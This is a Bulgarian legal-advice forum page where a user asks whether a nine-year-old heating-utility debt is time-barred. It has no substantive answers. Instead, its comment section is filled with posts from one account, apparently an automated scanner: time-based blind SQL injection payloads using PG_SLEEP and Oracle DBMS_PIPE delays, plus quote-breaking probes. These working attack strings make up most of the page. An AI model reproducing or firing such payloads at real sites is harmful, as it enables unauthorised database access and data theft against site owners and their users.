Задължения към Топлофикация с давност 9 години

27.04.2011г. 11:11:21
Здравейте, На 19.04.2011г. получих Покана за доброволно плащане въз основа на Изпълнителен лист от 14.05.2002г. за задължения към Топлофикация. Мога ли да се позова на изтекла давност, какво трябва да направя и в какъв срок?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:46
-1)) OR 726=(SELECT 726 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
CEqzQjIo' OR 13=(SELECT 13 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
bYFU5MlG') OR 26=(SELECT 26 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
7ozCrupW')) OR 24=(SELECT 24 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
05.10.2023г. 07:47
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
05.10.2023г. 07:47
1'"
lxbfYeaa
05.10.2023г. 07:47
@@6CIZN

Коментар